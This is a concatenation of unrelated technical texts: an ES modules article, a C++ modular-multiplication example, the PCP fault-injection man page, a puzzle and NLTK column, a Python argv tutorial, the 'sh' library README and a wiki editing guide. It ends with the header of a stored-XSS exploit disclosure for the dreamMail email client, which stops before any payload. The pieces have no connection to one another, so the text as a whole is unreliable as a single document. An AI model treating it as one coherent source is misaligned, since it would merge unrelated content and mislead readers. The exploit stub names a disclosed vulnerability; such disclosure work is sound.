To answer this question, we need to go way back to the fundamentals of JavaScript. In JavaScript, like many other programming languages, a large portion of our focus is on building, managing, and using variables and functions. You can consider these as building blocks that will be used together to form logical sequences that deliver an end result to the user. However, as the number of variables, functions, and files that contain them increases so does the importance to maintain them. For example, you cannot have the change of a variable unexpectedly affect other unrelated parts of the code, even if they share the same name.
At the file level, we have solved this problem. You can define variables inside functions, and code outside those function scopes cannot access or manipulate them. And if you need a common variable that is shared among different functions, you can put it at the top of the file, so all of them can access it. This is demonstrated in the code below:
// file.js
// a file-level variable shared by the functions below
var sharedName = "ES modules";

function getGreeting() {
  return "Hello from " + sharedName + "!";
}

function greet() {
  console.log(getGreeting());
}
But what about having such a mechanism between different files?
Well, as a first attempt, you might want to do something similar. Imagine several files in your codebase need access to a certain type of library. That library, like jQuery, could be a selection of helper functions to help your development workflow. In such a scenario, you need to put the library instance somewhere that can be accessible to all the files that might need it. One of the initial steps of handling this was to put the library on a global script. Now you might think since these global scripts are instantiated in the entry file where all the other files have access, then the issue of sharing access to certain functionalities or libraries will become easier, right? Well, not really.
This approach comes with certain problems. The dependency between different files and shared libraries will become important. This becomes a headache if the number of files and libraries increases because you always have to pay attention to the order of script files, which is an implicit way of handling dependency management. Take the below code for instance:
<script src="index1.js"></script>
<script src="index2.js"></script>
<script src="main.js"></script>
In the code shown above, if you add some functionality in index1.js that references something from index2.js, it will not work, because the code execution flow has still not reached index2.js at that point in time. Besides this dependency management, there are other types of issues when it comes to using script tags as a way of sharing functionalities, like:
- Slower processing time as each request blocks the thread
- Performance issue as each script initiates a new HTTP request
You can probably imagine that refactoring and maintaining code that relies on such a design is problematic. Every time you want to make a change, you have to worry about not breaking any other previous functionalities. That is where modules come to the rescue.
ES modules or, in general, modules are defined as a group of variables and functions that are grouped together and are bound to a module scope. It means that it is possible to reference variables in the same module, but you can also explicitly export and import other modules. With such an architecture, if a certain module is removed and parts of the code break as a result, you will be able to understand what caused the issue.
As mentioned before, there have been several attempts to bring the module design to JavaScript. But so far the closest concept of a native module design has been ES modules which we are going to examine in this article.
We are going to see a few basic examples of how ES modules are used and then explore the possibility of using them in production sites. We’ll also look at some tools that can help us achieve this goal.
ES modules in browsers
It is very easy to define a module in browsers, as we have access to HTML tags. It would be sufficient to pass a type='module' attribute to the script tag. When the browser reaches any script tag with this attribute, it knows that this script needs to be parsed as a module. It should look something like this:
// External Script
<script type="module" src="./index.js"></script>

// Inline Script
<script type="module">
  import { main } from './index.js';
  // ...
</script>
In this case, the browser will fetch any of the top-level scripts and put them in something called a module map with a unique reference. This way, if it encounters another script that points to the same reference, it just moves on to the next script, and therefore every module will be parsed only once. Now let's imagine the content of index.js looks like this:
// index.js
import { something } from './something.js'

export const main = () => {
  console.log('do something');
}
//..
When we look at this file, we see both import and export statements, which are ways of using and exposing dependencies. So when the browser is completing its asynchronous journey of fetching and parsing these dependencies, it just starts the process from the entry file (which, in this case, was the HTML file above) and then continues putting references of all the nested modules from the main scripts in the module map until it reaches the most deeply nested modules.
Keep in mind that fetching and parsing modules is just the first step of loading modules in browsers. If you are interested in reading more in detail about the next steps, give this article a careful read.
But for us, we will try to shed a bit of light on one aspect of ES module usage in browsers: the use of import-maps to make the process of specifying module specifiers easier.
Why and how to use import-maps?
In the construction phase of loading modules, there are two initial steps to take.
The first one is module resolution which is about figuring out where to download the module from. And the second step is actually downloading the module. This is where one of the biggest differences between modules in a browser context and a context like Node.js comes up. Since Node.js has access to the filesystem, its way of handling module resolution is different from the browser. That is why you can see something like this in a Node.js context:
const _lodash = require('lodash');
Also, in a browser context using a builder tool like Webpack, you would do something like this:
import * as _lodash from 'lodash';
In this example, the 'lodash' module specifier is known to the Node.js process because it has access to the filesystem and the packages distributed through the npm package manager. But the browser can only accept URLs for the module specifier, because the only mechanism for getting modules is to download them over the network. This was the case until a new proposal for ES modules, called import-maps, was introduced to resolve this issue and bring a more consistent look and feel between module usage in browsers and other tools and bundlers.
So an import-map defines a map of module import names, which allows developers to provide bare import specifiers like import "jquery". If you use such an import statement in browsers today, it will throw, because bare specifiers are not treated as relative URLs and are explicitly reserved. Let's see how it works.
By providing the attribute type="importmap" on a script tag, you can define this map and then define a series of bare import names with relative or absolute URLs. Remember that if you are specifying a relative URL, as in the example below, the location of that file should be relative to the file where the import-map is defined, which is index.html in this instance:
// index.html
<script type="importmap">
{
  "imports": {
    "lodash": "/node_modules/lodash-es/lodash.js"
  }
}
</script>
After defining this map, you can directly import lodash anywhere in your code:
import lodash from 'lodash';
But if you did not use import-maps, you would have to do something like the code shown below, which is cumbersome as well as inconsistent with how modules are defined today with other tools:
import lodash from "/node_modules/lodash-es/lodash.js";
So it is clear that using import-maps helps bring consistency to how modules are used today. Chances are, if you are used to requiring or importing modules in the context of Node.js or Webpack, some basic groundwork has been done for you already. Let's explore a few of these scenarios and see how they are handled via import-maps in browsers.
You have probably seen that sometimes the module specifier is used without the extension when used in Node.js. For example:
// requiring something.js file
const something = require('something');
This is because, under the hood, Node.js and other similar tools are able to try different extensions for the module specifier you defined until they find a good match. But such functionality is also possible via import-maps when using ES modules in browsers. This is how you would define the import-map to achieve this:
{ "imports": { "lodash/map": "/node_modules/lodash/map.js" } }
As you can see, we are defining the name of the module specifier without the .js extension. This way, we are able to import the module in two ways:
// Either this
import map from "lodash/map"
// Or
import map from "lodash/map.js"
One could argue that the extension-less file import is a bit ambiguous, which is valid. I personally prefer to precisely define the file extension, even when defining module specifiers in a Node.js or Webpack context. Additionally, if you want to adopt the extension-less strategy with import-maps, you will be overwhelmed, as you have to define the extra extension-less module specifier for each of the modules in a package, and not only the top-level file. This could easily get out of hand and bring less consistency to your code.
It is common for libraries and packages distributed through npm to contain several modules that you can import into your code. For example, a package like lodash contains several modules. Sometimes you want to import the top-level module, and sometimes you might be interested in a specific module in a package. Here is how you might specify such functionality using import-maps:
{ "imports": { "lodash": "/node_modules/lodash/lodash.js", "lodash/": "/node_modules/lodash/" } }
By specifying a separate module specifier name, lodash/, and mirroring the same thing in the address, /node_modules/lodash/, you allow specific modules in the package to be imported with ease, which will look something like this:
// You can directly import lodash
import _lodash from "lodash";
// or import a specific module
import _shuffle from "lodash/shuffle.js";
Conclusion
Together in this article, we have learned about the ES modules. We covered why modules are essential and how the community is moving towards using the standard way of handling them.
When it comes to using ES modules in browsers today, an array of questions comes to mind: compatibility with older browsers, fallback handling, and the true place of ES modules next to bundlers and build tools. I strongly think ES modules are here to stay, but their presence does not eliminate the need for bundlers and builders, because they serve other essential purposes such as dead code elimination, minification, and tree shaking. As we already know, popular tools like Node.js are also adopting ES modules in newer versions.
ES modules have wide browser support currently. Some of the features around ES modules, such as dynamic import (allowing function-based imports) and import.meta (supporting Node.js cases), are part of the JavaScript spec now. And as we explored, import-maps is another great feature that allows us to smooth over the differences between Node.js and browsers.
I can say with confidence the future looks bright for ES modules and their place in the JavaScript community.
Here we will see how to calculate the remainder of an array multiplication after dividing the result by n. The array and the value of n are supplied by the user. Suppose the array is {12, 35, 69, 74, 165, 54}; the multiplication will be (12 * 35 * 69 * 74 * 165 * 54) = 19107673200. Now if we want to get the remainder after dividing this by 47, it will be 14.
As we can see, this problem is very simple: we could multiply the elements and then get the result using the modulus operator. But the main problem is that when we calculate the multiplication, it may exceed the range of int, or even long, and so may return invalid results. To overcome this problem, we will follow this process.
begin
   mul := 1
   for i in range 0 to size – 1, do
      mul := (mul * (arr[i] mod n)) mod n
   done
   return mul mod n
end
#include<iostream>
using namespace std;
int multiplyRemainder(int arr[], int size, int n){
   int mul = 1;
   for(int i = 0; i<size; i++){
      mul = (mul * (arr[i] % n)) % n;
   }
   return mul % n;
}
int main(){
   int arr[6] = {12, 35, 69, 74, 165, 54};
   int size = 6;
   int n = 47;
   cout << "Remainder: " << multiplyRemainder(arr, size, n);
}
Remainder: 14
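The same computation can be cross-checked in Python, whose arbitrary-precision integers make the direct product safe to compute; the stepwise reduction below mirrors the C++ loop and relies on the identity (a * b) mod n = ((a mod n) * (b mod n)) mod n:

```python
# Cross-check of the identity the C++ loop relies on.
arr = [12, 35, 69, 74, 165, 54]
n = 47

direct = 1
for x in arr:
    direct *= x            # full product: 19107673200 (would overflow a 32-bit int)

stepwise = 1
for x in arr:
    stepwise = (stepwise * (x % n)) % n   # intermediate values stay below n*n

print(direct % n, stepwise)   # 14 14
```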
PMFAULT(3) Library Functions Manual PMFAULT(3)
__pmFaultInject, PM_FAULT_POINT, PM_FAULT_CHECK, __pmFaultSummary - Fault Injection Infrastracture for QA
#include <pcp/pmapi.h> #include <pcp/impl.h> #include <pcp/fault.h> void __pmFaultInject(const char *ident, int class); void __pmFaultSummary(FILE *f); PM_FAULT_POINT(ident, class); PM_FAULT_CHECK(class); cc -DPM_FAULT_INJECTION=1 ... -lpcp_fault
As part of the coverage-driven changes to QA in PCP 3.6, it became apparent that we needed someway to exercise the ``uncommon'' code paths associated with error detection and recovery. The facilities described below provide a basic fault injection infrastructure (for libpcp only at this stage, alhough the mechanism is far more general and could easily be extended). A special build is required to create libpcp_fault and the associated <pcp/fault.h> header file. Once this has been done, new QA applications may be built with -DPM_FAULT_INJECTION=1 and/or existing applications can be exercised in presence of fault injection by forcing libpcp_fault to be used in preference to libpcp as described below. In the code to be tested, __pmFaultInject defines a fault point at which a fault of type class may be injected. ident is a string to uniquely identify the fault point across all of the PCP source code, so something like "libpcp/" __FILE__ ":<number>" works just fine. The ident string also determines if a fault will be injected at run- time or not - refer to the RUN-TIME CONTROL section below. class selects a failure type, using one of the following defined values (this list may well grow over time): PM_FAULT_ALLOC Will cause the next call to malloc(3), realloc(3) or strdup(3) to fail, returning NULL and setting errno to ENOMEM. We could extend the coverage to all of the malloc-related routines, but these three are sufficient to cover the vast majority of the uses within libpcp. PM_FAULT_PMAPI Will cause the next call to a PMAPI routine to fail by returning the (new) PCP error code PM_ERR_FAULT. At the this stage, only __pmRegisterAnon(3) has been instrumented as a proof of concept for this part of the facility. PM_FAULT_TIMEOUT Will cause the next call to an instrumented routine to return the PCP error code PM_ERR_TIMEOUT. At this stage, only __pmGetPDU(3) has been instrumented to check for this class of fault injection. 
To allow fault injection to co-exist within the production source code, PM_FAULT_POINT is a macro that emits no code by default, but when PM_FAULT_INJECTION is defined this becomes a call to __pmFaultInject. Throughout libpcp we use PM_FAULT_POINT and not __pmFaultInject so that both libpcp and libpcp_fault can be built from the same source code. Similarly, the macro PM_FAULT_CHECK emits no code unless PM_FAULT_INJECTION is defined, in which case if a fault of type class has been armed with __pmFaultInject then, the enclosing routine will trigger the associated error behaviour. For the moment, this only works for the following class types: PM_FAULT_PMAPI The enclosing routine will return immediately with the value PM_ERR_FAULT - this assumes the enclosing routine is of type int foo(...) like all of the PMAPI routines. PM_FAULT_TIMEOUT The enclosing routine will return immediately with the value PM_ERR_TIMEOUT - this assumes the enclosing routine is of type int foo(...) like all of the PMAPI routines. A summary of fault points seen and faults injected is produced on stdio stream f by __pmFaultSummary. Additional tracing (via -Dfault and DBG_TRACE_FAULT) and a new PMAPI error code (PM_ERR_FAULT) are also defined, although these will only ever be seen or used in libpcp_fault. If DBG_TRACE_FAULT is set the first time __pmFaultInject is called, then __pmFaultSummary will be called automatically to report on stderr when the application exits (via atexit(3)). Fault injection cannot be nested. Each call to __pmFaultInject clears any previous fault injection that has been armed, but not yet executed. The fault injection infrastructure is not thread-safe and should only be used with applications that are known to be single-threaded.
By default, no fault injection is enabled at run-time, even when __pmFaultInject is called. Faults are selectively enabled using a control file, identified by the environment variable $PM_FAULT_CONTROL; if this is not set, no faults are enabled. The control file (if it exists) is read the first time __pmFaultInject is called, and contains lines of the form: ident op number that define fault injection guards. ident is a fault point string (as defined by a call to __pmFaultInject, or more usually the PM_FAULT_POINT macro). So one needs access to the libpcp source code to determine the available ident strings and their semantics. op is one of the C-style operators >=, >, ==, <, <=, != or % and number is an unsigned integer. op number is optional and the default is >0 The semantics of the fault injection guards are that each time __pmFaultInject is called for a particular ident, a trip count is incremented (the first trip is 1); if the C-style expression tripcount op number has the value 1 (so true for most ops, or the remainder equals 1 for the % op), then a fault of the class defined for the fault point associated with ident will be armed, and executed as soon as possible. Within the control file, blank lines are ignored and lines beginning with # are treated as comments. For an existing application linked with libpcp fault injection may still be used by forcing libpcp_fault to be used in the place of libpcp. The following example shows how this might be done. 
$ export PM_FAULT_CONTROL=/tmp/control
$ cat $PM_FAULT_CONTROL
# ok for 2 trips, then inject errors
libpcp/events.c:1 >2
$ export LD_PRELOAD=/usr/lib/libpcp_fault.so
$ pmevent -Dfault -s 3 sample.event.records
host: localhost
samples: 3
interval: 1.00 sec
sample.event.records[fungus]: 0 event records
__pmFaultInject(libpcp/events.c:1) ntrip=1 SKIP
sample.event.records[bogus]: 2 event records
10:46:12.413 --- event record [0] flags 0x1 (point) ---
sample.event.param_string "fetch #0"
10:46:12.413 --- event record [1] flags 0x1 (point) ---
sample.event.param_string "bingo!"
__pmFaultInject(libpcp/events.c:1) ntrip=2 SKIP
sample.event.records[fungus]: 1 event records
10:46:03.416 --- event record [0] flags 0x1 (point) ---
__pmFaultInject(libpcp/events.c:1) ntrip=3 INJECT
sample.event.records[bogus]: pmUnpackEventRecords: Cannot allocate memory
__pmFaultInject(libpcp/events.c:1) ntrip=4 INJECT
sample.event.records[fungus]: pmUnpackEventRecords: Cannot allocate memory
__pmFaultInject(libpcp/events.c:1) ntrip=5 INJECT
sample.event.records[bogus]: pmUnpackEventRecords: Cannot allocate memory
=== Fault Injection Summary Report ===
libpcp/events.c:1: guard trip>2, 5 trips, 3 faults
Refer to the PCP and PCP QA source code.

src/libpcp/src/derive.c uses PM_FAULT_CHECK.
src/libpcp/src/err.c and src/libpcp/src/events.c use PM_FAULT_POINT.
src/libpcp/src/fault.c contains all of the underlying implementation.
src/libpcp_fault contains the recipe and Makefile for creating and installing libpcp_fault and <pcp/fault.h>.
QA/477 and QA/478 show examples of control file use.
PM_FAULT_CONTROL
    Full path to the fault injection control file.
LD_PRELOAD
    Force libpcp_fault to be used in preference to libpcp.
PMAPI(3)
Some non-recoverable errors are reported on stderr.
In this month's column, we discuss a medley of topics, including solving cognitive intelligence puzzles and how Python is being used widely in AI and Natural Language Processing.
For the past few months, we have been discussing information retrieval and Natural Language Processing (NLP), along with the algorithms associated with them. In this month's column, we take a break from that discussion to look at some of the questions I have received from our readers recently. Given that we generally discuss coding problems, some readers have asked whether I can discuss some puzzles. So instead of discussing math puzzles, I thought it might be interesting to try out something that tests our cognitive intelligence capabilities. Here is the first puzzle, which initially appears quite simple, but many people, including college graduates, seem to get wrong on their first try.
There are three people Andrew, Anne, and Bobby. Andrew is looking at Anne. Anne is looking at Bobby. Andrew is married but Bobby is not married. Now the question to you is: Is a married person looking at an unmarried person? Choose the correct answer from the following options:
(A) Yes (B) No (C) Cannot be determined
Most people tend to choose the answer (C). Do you think the answer is correct? If not, why not? First take a couple of minutes to think through your reply. Well, the correct answer is (A). The key point to note is that each person can be in either a married or unmarried state. We know that Andrew is married and that Bobby is not. The reason most folks choose (C) is because there is no information regarding the marital state of Anne. But remember that the question is not whether Anne is married or not. The actual question is whether a married person is looking at an unmarried person. Anne can either be married or unmarried. If she is married, then answer (A) is indeed a married person looking at an unmarried one since Bobby is unmarried. If Anne is unmarried, then too, (A) emerges as the correct answer since Andrew who is married, is looking at Anne who is unmarried. Hence the answer is (A) and not (C). The reason most people choose (C) is because they are poor in disjunctive reasoning, which requires all the different possibilities or outcomes associated with a given situation to be taken into account before arriving at a conclusion.
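Since this is a programming column, it is worth noting that disjunctive reasoning of this kind is exactly what exhaustive enumeration automates. A small Python sketch that checks both possible states for Anne:

```python
# Enumerate both possible marital states for Anne and check, in each case,
# whether some married person is looking at some unmarried person.
def married_looks_at_unmarried(anne_married):
    married = {"Andrew": True, "Anne": anne_married, "Bobby": False}
    looking = [("Andrew", "Anne"), ("Anne", "Bobby")]
    return any(married[a] and not married[b] for a, b in looking)

# True for both cases, so the answer is (A) regardless of Anne's state.
print(all(married_looks_at_unmarried(state) for state in (True, False)))
```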
Here is another puzzle to exercise your brain. This being a simple puzzle, I would like you to answer this question very quickly, in your mind and without using pen and paper.
A bat and a ball cost $1.10. The bat costs one dollar more than the ball. How much does the ball cost?
The immediate answer that most people give is 10 cents. However, if you work it out with a bit more careful thought, if the ball costs 10 cents, this makes the cost of the bat as one dollar and 10 cents since the bat costs one dollar more than the ball. The total cost of both bat and ball would then be $1.20, which is incorrect since the total given in the puzzle is $1.10. With a little bit of careful thought, you will find that the cost of the ball is five cents and that of the bat is one dollar five cents, which makes the total $1.10. This problem is very simple as far as mathematics is concerned. But when asked to name the answer immediately, somehow most folks blurt out the answer as ten cents instead of as five cents. The reason for this cognitive dysfunction is because our quick thinking brain is deceived into coming up with an obvious answer. However, a little more careful thinking prevents this error of reasoning.
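The slow, careful route can also be delegated to brute force; a short Python search over all prices in cents confirms the answer:

```python
# Total is 110 cents and the bat costs exactly 100 cents more than the ball.
solutions = [ball for ball in range(111) if ball + (ball + 100) == 110]
print(solutions)  # [5] -> the ball costs 5 cents, the bat 105 cents
```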
Here’s the third puzzle.
You are given four cards, with each card having a digit on one side and a letter on the other. The hypothesis you need to validate is that if a card has a vowel on one side, then it has an even number on the other side. The four cards are laid such that Card 1 shows A, Card 2 shows D, Card 3 shows 4 and Card 4 shows 7. You need to specify which of these four cards must be turned over to check whether this rule is true or not.
Most people give the answer as the cards containing A and 4. But this is incorrect. Can you figure out why? The correct answer is the cards containing A and 7. It is obvious why the A card needs to be checked. If Card A has an odd number on the other side, obviously the rule is incorrect. Why is it that Card 4 need not be checked? The reason is that if Card 4 contains a consonant on the other side, it still does not violate the rule. (If you disagree, think carefully about the rule that we are trying to verify here.) On the other hand, if Card 7 contains a vowel on its other side, then the rule is disproved. This is another example of how the short-cut heuristics employed by our brain to quickly jump to a solution can lead us to the wrong answer.
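The disjunctive reasoning here can be made mechanical: for each visible face, ask whether some hidden face could violate the rule "vowel implies even number on the back". A short Python sketch (the helper name is ours, just for illustration):

```python
# Rule under test: if one side shows a vowel, the other side shows an even number.
# A card is worth turning over only if some hidden side could violate the rule.
VOWELS = set("AEIOU")

def worth_turning(visible):
    if visible.isalpha():
        # A letter card can violate the rule only if it is a vowel
        # (an odd number could be hiding behind it).
        return visible in VOWELS
    # A digit card can violate the rule only if it is odd
    # (a vowel could be hiding behind it).
    return int(visible) % 2 == 1

cards = ["A", "D", "4", "7"]
print([c for c in cards if worth_turning(c)])  # ['A', '7']
```

Enumerating the possibilities this way makes it obvious why the consonant card D and the even card 4 can never falsify the rule.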
You may have been wondering why we are discussing cognitive intelligence puzzles in a column devoted to computer science. Computer science projects are littered with cases where a poor choice or decision in the planning, requirements, implementation or testing phases has led to a costly debacle. It is therefore all the more important for computer scientists to reason effectively and to be aware of the short-cut heuristics and illusions the human brain can come up with. I would like to suggest that our readers look up the book Thinking, Fast and Slow by Daniel Kahneman, a Nobel Prize laureate. The book is an effective guide to the various heuristics and biases the human mind is prone to, and to becoming an effective decision maker.
Vivekanandan, one of our student readers, had asked me about libraries for AI and NLP algorithms. Given that a few other readers also asked how to ramp up on NLTK (Natural Language Toolkit), I felt it would be good to have a short discussion on the Python libraries available for AI and NLP and how one can quickly get started with them. This month's article is co-authored by one of our student readers, Ankith Subramanya from The International School, Bengaluru, who shares his experience of ramping up on Python libraries for AI and NLP.
As computer science develops, it is exploring problems that arise in the real world. Artificial Intelligence (AI) and Natural Language Processing (NLP) are two fields with great practical applications. AI is the science of making machines intelligent, so that they can be applied to a wide range of practical problems. AI has vast potential and can have a great impact on every aspect of our lives, from the household (robotic vacuum cleaners) to national defence (missiles). As AI is a vast topic, research in it spans several specialised fields such as reasoning, knowledge representation, planning and learning. One of these fields is NLP, which is probably the most human-centric field in AI, in the sense that it involves the interaction between natural human languages and the computer. The goal of research in this field is to make communication between humans and computers as natural and effortless as possible, as if the computer were a person.
Python is regarded by many as a simple yet powerful language. Its simplicity and quickness can be attributed to features such as built-in high level data types and dynamic typing. Python is increasingly preferred for AI, NLP and data mining. Apart from the characteristic benefits that it offers to developers, the main reason for Python's growing adoption is the vast number of tools and libraries it offers. These can be broadly classified into general AI, machine learning, natural language and text processing, and neural networks. AIMA is a library that includes a number of Python implementations of the algorithms from Russell and Norvig's Artificial Intelligence: A Modern Approach.
One fun library that you can look at is easyAI, a simple Python engine for two-player games involving AI. With this framework, you can create and play various games such as Tic-Tac-Toe and Connect 4. The steps for setting up and installing easyAI, along with a user manual and examples, are provided at zulko.github.io/easyAI/. To create a two-player game with easyAI, you simply create a sub-class of the TwoPlayersGame class (from the easyAI library). Then, you define a set of methods that specify the rules of your game. To start the game, create an object of your game class and then call its play method.
One very effective natural language and text processing library that Python offers is NLTK, a platform for building Python programs that work with human language data. It provides the tools and libraries required for NLP. To make use of NLTK, you must first install Python and then install the NLTK library. Optional installs such as NumPy are recommended, but not necessary. The steps and links for installation can be found on the NLTK website. With the NLTK libraries, you can do many delightful things with a piece of text, such as analyse its sentiment (positive or negative), tokenise it (split the text into parts such as paragraphs, sentences or words), stem it (remove and replace word suffixes to arrive at the common root form of the word), tag and chunk it (recognise different words as nouns, verbs, etc), and a lot more.
You can make your own simple sentiment analysis software. The following trivial code example will give readers a brief idea of how to make it work.
import sys
import nltk

sentence = sys.stdin.read()  # read the input text from stdin
tokens = nltk.word_tokenize(sentence)
scorer = 0  # keep a score of how positive or negative the statement is
for word in tokens:
    # In the following if statements, we assign a score depending on how
    # negative or positive a word is, from a selected set of words.
    # You can add more words or choose different words.
    if word == "good":
        scorer = scorer + 1
    if word == "great":
        scorer = scorer + 2
    if word == "bad":
        scorer = scorer - 1
    if word == "terrible":
        scorer = scorer - 2
if scorer == 0:
    print("neutral")
elif scorer > 0:
    print("positive")
else:
    print("negative")
The above example is very basic but to actually make software that can process the complexities of various real world texts, more rigorous algorithms and larger sets of data are used.
If you have any favourite programming questions/software topics that you would like to discuss on this forum, please send them to me, along with your solutions and feedback, at sandyasm_AT_yahoo_DOT_com. Till we meet again next month, happy programming.
Passing List as Command Line Argument in Python
In this tutorial, we will see how we can pass a Python list as a single argument in the command line shell of the system. We will be using the sys module to accomplish this. Let’s see more on this topic further.
List as Command Line Argument in Python
In order to get access to the arguments passed in the command line shell in Python we use sys.argv. The arguments in sys.argv are stored in the form of an array. The first element in the array contains the name of the Python file. The following elements are the arguments passed after the name of the file.
Have a look at the given program.
import sys

for arg in sys.argv:
    print(arg)
Output:
C:\Users\Ranjeet Verma\Desktop>python args.py arg1 arg2 arg3
args.py
arg1
arg2
arg3
As you can see, sys.argv contains the file name as its first element, followed by the arguments as the next elements. But what if we want to pass an entire list as a single command line argument? How do we do it?
The following example takes a list as a command line argument and prints individual elements using a loop. See the code and its output for a better understanding.
import sys

for arg in sys.argv:
    print(arg)

l = len(sys.argv[1])
li = sys.argv[1][1:l-1].split(',')
print("The list elements are:")
for el in li:
    print(el)
Output:
C:\Users\Ranjeet Verma\Desktop>python args.py [1,2,3,4]
args.py
[1,2,3,4]
The list elements are:
1
2
3
4
Let’s try to understand the code. First, we take the list as a command line argument; we know it is the second element (index 1) of the sys.argv array. We slice off the brackets, which are the first and last characters of the argument, and split the remainder on the commas, which gives us the list li. (Note that the elements are still strings; convert them with int() if you need numbers.) We can now use this list in our program for any kind of operation. Here, we print the elements.
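A sturdier variant (not from the original tutorial) is to let Python's own parser handle the bracketed argument: ast.literal_eval copes with whitespace, quoted strings and nested lists. The parse_list helper name below is just for illustration:

```python
import ast
import sys

def parse_list(arg):
    """Parse a command line argument such as "[1,2,3,4]" into a Python list."""
    value = ast.literal_eval(arg)
    if not isinstance(value, list):
        raise ValueError("expected a list literal, got %r" % (value,))
    return value

if __name__ == "__main__" and len(sys.argv) > 1:
    for el in parse_list(sys.argv[1]):
        print(el)
```

Unlike the slice-and-split approach, this keeps the element types intact, so [1,2,3,4] arrives as integers rather than strings.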
Thank you and keep coding.
sh 0.107
Python subprocess wrapper
``sh`` is a unique subprocess wrapper that maps your system programs to
Python functions dynamically. ``sh`` helps you write shell scripts in
Python by giving you the good features of Bash (easy command calling, easy
piping) with all the power and flexibility of Python.
```python
from sh import ifconfig
print ifconfig("eth0")
```
``sh`` is not a collection of system commands implemented in Python.
# Getting
$> pip install sh
# Usage
The easiest way to get up and running is to import sh
directly or import your program from sh:
```python
import sh
print sh.ifconfig("eth0")
from sh import ifconfig
print ifconfig("eth0")
```
A less common usage pattern is through ``sh``'s Command wrapper, which takes a
full path to a command and returns a callable object. This is useful for
programs that have weird characters in their names or programs that aren't in
your $PATH:
```python
import sh
ffmpeg = sh.Command("/usr/bin/ffmpeg")
ffmpeg(movie_file)
```
The last usage pattern is for trying ``sh`` through an interactive REPL. By
default, this acts like a star import (so all of your system programs will be
immediately available as functions):
    $> python sh

## Keyword Arguments

Keyword arguments also work like you'd expect: they get replaced with the long-form and short-form commandline option:

```python
# resolves to "curl -o page.html --silent"
curl("", o="page.html", silent=True)
# or if you prefer not to use keyword arguments, this does the same thing:
curl("", "-o", "page.html", "--silent")
# resolves to "adduser amoffat --system --shell=/bin/bash --no-create-home"
adduser("amoffat", system=True, shell="/bin/bash", no_create_home=True)
# or
adduser("amoffat", "--system", "--shell", "/bin/bash", "--no-create-home")
```
## Piping
Piping has become function composition:
```python
# sort this directory by biggest file
print sort(du(glob("*"), "-sb"), "-rn")
# print the number of folders and files in /etc
print wc(ls("/etc", "-1"), "-l")
```
## Redirection
``sh`` can redirect the standard and error output streams of a process to a
file or file-like object. This is done with the special _out and _err keyword
arguments:

```python
ls(_out="/tmp/dir_contents")
```
## Baking
``sh`` is capable of "baking" arguments into commands. This is similar
to the stdlib functools.partial wrapper. An example can speak volumes:
```python
from sh import ssh
# calling whoami on the server. this is tedious to do if you're running
# any more than a few commands.
iam1 = ssh("myserver.com", "-p 1393", "whoami")
# wouldn't it be nice to bake the common parameters into the ssh command?
myserver = ssh.bake("myserver.com", p=1393)
print myserver # "/usr/bin/ssh myserver.com -p 1393"
# resolves to "/usr/bin/ssh myserver.com -p 1393 whoami"
iam2 = myserver.whoami()
assert(iam1 == iam2) # True!
```
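For comparison, the stdlib functools.partial wrapper mentioned above behaves the same way for plain Python functions; the ssh_command helper here is a toy stand-in that only builds the command string, not part of ``sh``:

```python
from functools import partial

def ssh_command(host, port, cmd):
    # Toy stand-in: just render the command line that would be run.
    return "/usr/bin/ssh %s -p %d %s" % (host, port, cmd)

# "Bake" the common parameters in, much as sh's .bake() does for commands.
myserver = partial(ssh_command, "myserver.com", 1393)
print(myserver("whoami"))  # /usr/bin/ssh myserver.com -p 1393 whoami
```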
Now that the "myserver" callable represents a baked ssh command, you
can call anything on the server easily:
```python
# resolves to "/usr/bin/ssh myserver.com -p 1393 tail /var/log/messages -n 10"
print myserver.tail("/var/log/messages", n=10)
```

## Glob Expansion

Glob expansion is not done on your arguments. For example, this will not work:

```python
from sh import du
print du("*")
```
You'll get an error to the effect of "cannot access '\*': No such file or directory".
This is because the "\*" needs to be glob expanded:
```python
from sh import du, glob
print du(glob("*"))
```
``sh`` automatically handles underscore-dash conversions. For example, if you want
to call apt-get:
```python
apt_get("install", "mplayer", y=True)
```
## Exit Codes

When a command run through ``sh`` returns a non-zero exit code, ``sh`` raises an exception
based on that exit code. However, if you have determined that an error code
is normal and want to retrieve the output of the command without ``sh`` raising an
exception, you can use the "_ok_code" special argument to suppress the exception:
```python
output = sh.ls("/some/nonexistent/folder", _ok_code=[0, 1, 2])
```
FNWiki:Editors
Create a new page
Instructions can be found from Create a new page -page.
Editing in general
To change a wiki entry, click on the "edit" link at the top of the page. This will bring you to the edit page. On this page you find a text box containing the wikitext: the editable source code from which the server produces the web page.
After adding to or changing the wikitext it is useful to press the "Show preview" button, which creates a preview but does not make the change publicly available.
You can make more changes and preview the page as many times as necessary. When you are satisfied with the layout and content - write a short description of your changes and then press the "Save page" button. The new page is now 'published', and available to the public.
Minor edits
When editing a page, a user has the option of marking the change as a "minor edit".
Categories
All pages can be put in a category by adding a category tag, e.g.: [[Category:Category name]]
This provides a link to the appropriate category page, which is in the namespace "Category". Pages can be included in more than one category by adding multiple category tags. These links show up at the bottom of the page.
Nokia Developer has a list of Categories that we propose are used in this Wiki. If these terms are used, then the search function works across ALL the Nokia Developer website areas, and is therefore much more useful to users.
New categories can be created if it is felt that the provided list does not cover a particular subject. If there is enough demand for a new category, Nokia Developer will most likely integrate that into the site wide metadata.
Subcategories
Adding a category tag to a category page makes the edited category a subcategory of the tag's category.
For example, you could edit [[Category:Video]] and add the link [[Category:Multimedia]]. The Video category would then be a subcategory of the Multimedia category.
Category page
A category page is automatically created for each category in which a page is categorized. A category page consists of:
- editable text
- list of subcategories
- list of pages in the category, excluding subcategories and images
- list of images in the category with a generated thumbnail for each image
The items in the lists all link to the pages concerned; in the case of the images this applies both to the image itself and to the text below it (the name of the image).
The category page lists are ordered alphabetically based on the categorized page's title. If a page seems to be in the wrong place in the list, you can adjust it by adding a sort key to the page's category tag.
[[Category:category name|sort key]]
For example, to add an article called Albert Einstein to the category "People" and have the article sorted by "Einstein, Albert" instead of "Albert Einstein", you would type "[[Category:People|Einstein, Albert]]".
Linking to a category page
If you want to link to a category page without the current page being added to it, you should use the link form [[:Category:Category name]]. Note the extra : before Category.
#!/usr/bin/python
'''
Author: loneferret of Offensive Security
Product: dreamMail e-mail client
Version: 4.6.9.2
Vendor Site:
Software Download:
Tested on: Windows XP SP3 Eng.
Tested on: Windows 7 Pro SP1 Eng.
dreamMail: Using default settings
E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you
get an annoying alert box etc etc etc.
Injection Point: Body
Gave vendor 7 days to reply in order to co-ordinate a release date.
Timeline:
16 Aug 2013: Tentative release date 23 Aug 2013
